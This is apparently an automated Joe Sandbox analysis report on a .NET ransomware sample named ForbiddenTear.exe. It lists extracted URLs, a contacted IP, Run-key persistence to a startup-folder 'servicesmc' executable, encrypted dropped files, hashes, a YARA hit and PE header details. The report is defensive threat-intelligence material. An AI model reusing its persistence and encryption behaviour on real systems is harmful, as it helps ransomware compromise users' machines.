    http://www.jiyu-kobo.co.jp/te | ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://en.wq | ForbiddenTear.exe, 00000000.00000003.211174928.00000000056D5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.jiyu-kobo.co.jp/jp/m | ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.galapagosdesign.com/DPlease | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://a9.com/-/spec/opensearchrss/1.0/:startIndex | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.fonts.com | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    http://www.sandoll.co.kr | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.urwpp.deDPlease | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.zhongyicts.com.cn | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://a9.com/-/spec/opensearchrss/1.0/:totalResults | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmp | false | | high
    http://www.flexerasoftware.com0 | ForbiddenTear.exe, 00000000.00000003.229575319.0000000003B6B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.sakkal.com | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    https://pagekite.net/offline/?&where=FE&proto=http&domain=wzl.pagekite.me&relay=::ff | ForbiddenTear.exe, 00000000.00000002.246307583.0000000002760000.00000004.00000001.sdmp | false | | high
    http://www.fontbureau.com.TTF | ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    https://blockchain.info/wallet/price-of-one-bitcoin | ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | false | | high
    http://www.inform-fiction.org/ | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.comalsd | ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://a9.com/-/spec/opensearchrss/1.0/:itemsPerPagehttp://a9.com/-/spec/opensearchrss/1.0/:startInd | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.apache.org/licenses/LICENSE-2.0 | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    http://www.fontbureau.com | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    http://www.galapagosdesign.com/ | ForbiddenTear.exe, 00000000.00000003.217396511.00000000056D7000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.libpng.org/pub/mng/spec/ | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | | high
    http://www.fontbureau.comF | ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://schemas.xmlsoap.org/soap/encoding/ | ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmp, ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.symauth.com/cps09 | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | | high
    http://www.jiyu-kobo.co.jp/R | ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://ocsp.thawte.com0 | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.djvuzone.org/ | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    https://gps.echosign.com | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.jiyu-kobo.co.jp/I | ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.comcomm | ForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.comtv | ForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.jiyu-kobo.co.jp/vam | ForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.comI.TTF. | ForbiddenTear.exe, 00000000.00000002.247366333.00000000056D0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.comL.TTF | ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.comcomd% | ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
    http://www.yahooapis.com/v1/base.rng:uri | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.jiyu-kobo.co.jp/jp/ | ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.fontbureau.coma | ForbiddenTear.exe, 00000000.00000003.215534515.00000000056D6000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.symauth.com/cps0( | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | | high
    http://www.fontbureau.comd | ForbiddenTear.exe, 00000000.00000003.216656150.00000000056D6000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    https://btc-e.com | ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | false | | high
    http://www.websitetest.com/ | ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000000.207910299.00000000003A5000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.carterandcone.coml | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.fontbureau.com/designers/cabarga.htmlN | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp | false | | high
    http://www.founder.com.cn/cn. | ForbiddenTear.exe, 00000000.00000003.212325334.00000000056D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.adrift.org.uk/) | ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.founder.com.cn/cn | ForbiddenTear.exe, 00000000.00000003.212325334.00000000056D4000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.fontbureau.com/designers/frere-jones.html | ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmp, ForbiddenTear.exe, 00000000.00000003.216316196.00000000056D6000.00000004.00000001.sdmp | false | | high
    https://www.bitstamp.net | ForbiddenTear.exe, ForbiddenTear.exe, 00000000.00000002.245582108.00000000003DB000.00000002.00020000.sdmp | false | | high
    http://www.jiyu-kobo.co.jp/v | ForbiddenTear.exe, 00000000.00000003.213905669.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
    http://www.fontbureau.com/designers/cabarga.html | ForbiddenTear.exe, 00000000.00000003.216224234.0000000005716000.00000004.00000001.sdmp | false | | high
    http://a9.com/-/spec/opensearchrss/1.0/:itemsPerPage | ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmp | false | | high
    http://www.jiyu-kobo.co.jp/p | ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmp | false | URL Reputation: safe; URL Reputation: safe; URL Reputation: safe | unknown
    http://www.jiyu-kobo.co.jp/m | ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmp | false | Avira URL Cloud: safe |
                                                                      unknown
                                                                      http://schemas.xmlsoap.org/wsdl/ForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://www.jiyu-kobo.co.jp/ForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmp, ForbiddenTear.exe, 00000000.00000003.213666391.00000000056D6000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.jiyu-kobo.co.jp/lForbiddenTear.exe, 00000000.00000003.213436321.00000000056D6000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://www.lua.org/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          http://www.macromedia.com/software/flash/open/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://hdf.ncsa.uiuc.edu/ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://www.fontbureau.com/designers8ForbiddenTear.exe, 00000000.00000002.247412530.00000000057E0000.00000002.00000001.sdmpfalse
                                                                                high
                                                                                https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/ForbiddenTear.exe, 00000000.00000002.262042398.000000000B76A000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                low
                                                                                http://www.symauth.com/rpa04ForbiddenTear.exe, 00000000.00000002.259671171.000000000AD6A000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://wzl.pagekite.meForbiddenTear.exe, 00000000.00000002.246269907.0000000002711000.00000004.00000001.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
95.216.167.199 | unknown | Germany | 24940 | HETZNER-ASDE | false

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 325968
Start date: 02.12.2020
Start time: 16:26:24
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: ForbiddenTear.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 19
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.rans.adwa.winEXE@12/5@1/1
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): smss.exe, csrss.exe, winlogon.exe, svchost.exe, UsoClient.exe
• Excluded IPs from analysis (whitelisted): 168.61.161.212, 67.26.83.254, 67.26.81.254, 67.27.234.126, 8.253.204.120, 67.27.235.254
• Excluded domains from analysis (whitelisted): blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time | Type | Description
16:27:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc.exe"
16:27:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc.exe"
16:28:07 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match | Associated Sample Name / URL | Detection | Context
HETZNER-ASDE | Hlxj8nfBay.exe | malicious | 88.99.66.31
HETZNER-ASDE | N6Fv7clWxO.exe | malicious | 168.119.38.182
HETZNER-ASDE | 7z6cDuH7Md.exe | malicious | 88.99.66.31
HETZNER-ASDE | cpMHTTwNC1.exe | malicious | 88.99.66.31
HETZNER-ASDE | PO8433L.exe | malicious | 88.198.22.168
HETZNER-ASDE | PayeeAdvice_HK02022_R0977491_02178_PDF.exe | malicious | 49.12.47.176
HETZNER-ASDE | IaGdBpfkmV.exe | malicious | 88.99.66.31
HETZNER-ASDE | AddressValidateForm-112430163-12012020.xls | malicious | 136.243.219.85
HETZNER-ASDE | AddressValidateForm-112430163-12012020.xls | malicious | 136.243.219.85
HETZNER-ASDE | http://www.8689christine.johnson.ketabebourse.com/?VGH=Y2hyaXN0aW5lLmpvaG5zb25Ab2Nzc2VydmljZXMuY29t&data=04|01|christine.johnson@ocsservices.com|ddf4e3b17f6248d1dc6908d895b7e874|a376937a74b041c598e16157ec71fafc|0|0|637423964394781731|Unknown|TWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=|1000&sdata=KfvutEfVt7ksS/9DwJPl3bv+x3vhTR1TFV12wMF4G+M=&reserved=0 | malicious | 138.201.54.59
HETZNER-ASDE | A5RsEkXArf.exe | malicious | 88.99.66.31
HETZNER-ASDE | invoice8049.xls | malicious | 88.198.58.29
HETZNER-ASDE | invoice8049.xls | malicious | 88.198.58.29
HETZNER-ASDE | SecuriteInfo.com.Heur.13015.xls | malicious | 88.198.58.29
HETZNER-ASDE | SecuriteInfo.com.Heur.13015.xls | malicious | 88.198.58.29
HETZNER-ASDE | SecuriteInfo.com.Heur.22446.xls | malicious | 88.198.58.29
HETZNER-ASDE | SecuriteInfo.com.Heur.22446.xls | malicious | 88.198.58.29
HETZNER-ASDE | http://mail.strantake.casa | malicious | 46.4.123.222
HETZNER-ASDE | invoice.xls | malicious | 88.198.58.29
HETZNER-ASDE | invoice.xls | malicious | 88.198.58.29

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Adobe\ARM\S\436\AdobeARM.msi
Process: C:\Users\user\Desktop\ForbiddenTear.exe
File Type: data
Category: dropped
Size (bytes): 992288
Entropy (8bit): 7.999838255099252
Encrypted: true
SSDEEP: 24576:yCXQBtyRC4uybH+WdSY9yNNOJRJ45/LzCxXhPd5MQI+Eh/gVua:NXY4RRqGSY9ojLmxXVE/Na
MD5: DCF19D19676D479781CC00CF2C16DD8E
SHA1: 84C807221C401E66DB0E15E65EA1AA04629FE263
SHA-256: FFD84F6D2CB078E2822858396E22B93725184F79B1E50E0328BFF733F58822DE
SHA-512: 5DDF4A92DF6B274C639560F460882AD997800E056252C0D9F4BE6FA197F1A46E9AB507BEC963CBF012DC03FD5E343A20041707C3791154A845B3FC352894682C
Malicious: false
Reputation: low
C:\ProgramData\Adobe\ARM\S\ARM.msi
Process: C:\Users\user\Desktop\ForbiddenTear.exe
File Type: data
Category: dropped
Size (bytes): 992288
Entropy (8bit): 7.999815444203463
Encrypted: true
SSDEEP: 24576:ObJouCDYxpu0e0ma7qxTWXsFuJsIHVLThotPJS9U4QQAMDx:ObJPCEx40e0maWxuJsqVHh+hpQn
MD5: 5F3DE833CE77C5186D35ACD020F89181
SHA1: 574FBE58D96D27E5CCEBC7EFBB7B4C0D7C8A5AAF
SHA-256: 94899F017F734A454B2B2FEC33745146F212BAFAE193341BC6B85BE7A907620E
SHA-512: 6413971375064D92716756AB6262F9585A475B05C28D02B6521C9CC0CF53FF6F38D4FC0ACBCCC643E6B9572F3C07F6138DE674FF26FA9D10BAA6592BD2D1D503
Malicious: false
Reputation: low
C:\ProgramData\Adobe\ARM\{291AA914-A987-4CE9-BD63-AC0A92D435E5}\RdrManifest3.msi
Process: C:\Users\user\Desktop\ForbiddenTear.exe
File Type: data
Category: dropped
Size (bytes): 15904
Entropy (8bit): 7.989292525747435
Encrypted: false
SSDEEP: 384:9KY6UsdhzcXQsF6nwKtpukDn3WvsVav4BBP4+XpJPvj8sv/Z:4isdoi3DVNzg+LvvJ
MD5: 889764FF709A2EBE9F557AB27714418D
SHA1: B3DBD4CDB523682E4DD81BFE9D165BAE996711F1
SHA-256: 79C024B8D57374772E98681A28F8CA91DD17A889EF7E092919E2ACC059217A74
SHA-512: C64048E24477D13FACF648DF9C50A44428D1F6267F577E5722BF87A154F8B17667EDAE09BCCF3C51BC231092121994869EE33244F2A00AF78F943927122AD428
Malicious: false
Reputation: low
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\AcroRead.msi
Process: C:\Users\user\Desktop\ForbiddenTear.exe
File Type: data
Category: modified
Size (bytes): 2794016
Entropy (8bit): 7.999929892590803
Encrypted: true
SSDEEP: 49152:N2ChBPyPNWANgiVWTqWghKeQVOsfWNRERJNbub4h1pUv5YdW:NhhBP83zx1hKIEmERHbZhHcYdW
MD5: 8E05F28682FB7D79B652F3C376E03659
SHA1: 56AF9D25398F887165E2F184D6D5B51DAE980332
SHA-256: 7C5700BFD4E91CBCD1102EB7A6361FF76139509892406C4A79A4599F8F59C712
SHA-512: 3A4EB50387E58350149791335CB7B9219F2082151CC87F9F90783F628BE7021284F532B69D166CFDB3A81B91C2F833E9FDFB8A7BF802871A8A1A1683F940D18D
Malicious: false
Reputation: low
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc
Process: C:\Users\user\Desktop\ForbiddenTear.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 569344
Entropy (8bit): 3.0842833726389145
Encrypted: false
SSDEEP: 6144:HOb20BkUl2EBm320B/bN2EBcZbKi+lDAA:HOqeKdAA
MD5: 8AD3B3C4396AF8F9661168F4D3FDA7A4
SHA1: 3FFA8A86CB8B7F65F319DAB071A1AD3FFB5FE7DC
SHA-256: 75574B8553F0C59E2D26CAFD3CF92FE38EB815D6F11A3473CDB39741BBDA72FD
SHA-512: 0D9B1F1C15B4CA3AD274EC6B810DDB5DB5A0B0F6D38A9BB92FE153242C6E3AEE5EBC66D51BDD02CE2AEFF1F47D1BEA3FB5534F3940AEC3A23EBB43A19A5D28FB
Malicious: true
Yara Hits:
• Rule: MAL_RANSOM_COVID19_Apr20_1, Description: Detects ransomware distributed in COVID-19 theme, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\servicesmc, Author: Florian Roth
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 50%
Reputation: low
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................"..........NA... ...`....@.. ....................... ............@..................................A..K....`.............................................................................. ............... ..H............text...T!... ...".................. ..`.rsrc.......`.......$..............@..@.reloc..............................@..B................0A......H............@......!....;..\............................................~....9.....*(....9...........*.*....0..........~....(....9....*......%.(.....%.r...p.%.(.....%.r...p.%...(.....~.....(.....(....:....*s.......o....8....(.....o.....@..........9.....o.....*.........]."........0...................(.....o.....*...0..........~.....s......r...po........_...&s.....s.........o......r;..po......rK..po.......o.....o....&.o...........&........9.....o......*.(.... .Ii.............R

                                                                                  Static File Info

                                                                                  General

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 3.0842833726389145
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: ForbiddenTear.exe
File size: 569344
MD5: 8ad3b3c4396af8f9661168f4d3fda7a4
SHA1: 3ffa8a86cb8b7f65f319dab071a1ad3ffb5fe7dc
SHA256: 75574b8553f0c59e2d26cafd3cf92fe38eb815d6f11a3473cdb39741bbda72fd
SHA512: 0d9b1f1c15b4ca3ad274ec6b810ddb5db5a0b0f6d38a9bb92fe153242c6e3aee5ebc66d51bdd02ce2aeff1f47d1bea3fb5534f3940aec3a23ebb43a19a5d28fb
SSDEEP: 6144:HOb20BkUl2EBm320B/bN2EBcZbKi+lDAA:HOqeKdAA
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................"..........NA... ...`....@.. ....................... ............@................................

                                                                                  File Icon

Icon Hash: 6eecccccd6d2f2f2

                                                                                  Static PE Info

                                                                                  General

Entrypoint: 0x47414e
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version: v4.0.30319
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x74100          0x4b          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x76000          0x189f4       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x90000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                                  Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x72154       0x72200   False     0.120725800931   data       2.53471849294   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x76000          0x189f4       0x18a00   False     0.144977395305   data       4.2788498639    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x90000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

Name           RVA      Size     Type                                                                                                                          Language  Country
RT_ICON        0x761a8  0x25a8   dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
RT_ICON        0x78750  0x10a8   dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
RT_ICON        0x797f8  0x468    GLS_BINARY_LSB_FIRST
RT_ICON        0x79c60  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON        0x7de88  0x10828  dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON  0x8e6b0  0x4c     data
RT_VERSION     0x8e6fc  0x2f8    data

                                                                                  Imports

DLL          Import
mscoree.dll  _CorExeMain

                                                                                  Version Infos

Description       Data
Translation       0x007f 0x04b0
LegalCopyright
InternalName      ForbiddenTear
FileVersion       1.0.0.0
CompanyName
LegalTrademarks   Encrypting all your shit :D
Comments
ProductName       Medjed
